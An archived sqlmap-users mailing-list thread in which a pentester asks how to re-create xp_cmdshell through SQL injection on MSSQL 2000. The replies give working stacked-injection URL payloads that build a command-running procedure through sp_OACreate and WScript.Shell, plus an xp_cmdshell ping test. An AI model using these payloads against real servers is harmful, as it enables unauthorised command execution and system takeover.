If you want to verify using network connectivity commands like ping, make sure
you have access to a public IP and set wireshark on that box and listen for an
ICMP connection from your target.
On Jun 18, 2012, at 6:59 AM, Adi Mutu wrote:
> No problem.
>
> Thanks, that worked, executed without error, however i still can't execute
> code.
> I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';--
> but nothing, no delay.
>
> From: Miroslav Stampar <miroslav.stam...@gmail.com>
> To: Adi Mutu <adi_mut...@yahoo.com>
> Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net>
> Sent: Monday, June 18, 2012 1:38 PM
> Subject: Re: [sqlmap-users] re-create xp_cmdshell
>
> My bad.
>
> I've thought that the problem is trivial :)
>
> This is the right way how to do it:
> http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET
> @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC
> sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null,
> @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;--
> (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py)
>
> That way you are bypassing that "syntax" obstacle by using a stored procedure
> master..sp_executesql to do it for you
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar
> <miroslav.stam...@gmail.com> wrote:
> Hi Adi.
>
> This means that CREATE PROCEDURE has to be used right after the semi-colon
> (;) sign.
>
> So, if you have a SELECT SQLi case like:
> SELECT * FROM users WHERE id=$_GET['id']
>
> you would need to inject into it something like:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE..
>
> As you are probably using "recreate steps" from
> https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that
> you would need to inject:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd
> varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int,
> @RunResult int%0a....
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
> Hello,
>
> I have a mssql 2000 sql injection in a pentest, i try to recreate xp_cmdshell
> and i get this:
>
> 'CREATE PROCEDURE' must be the first statement in a query batch.
>
> Anybody has any idea about this behavious and if it can be done something
> about this?
>
> Thanks
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats.
> http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/_______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
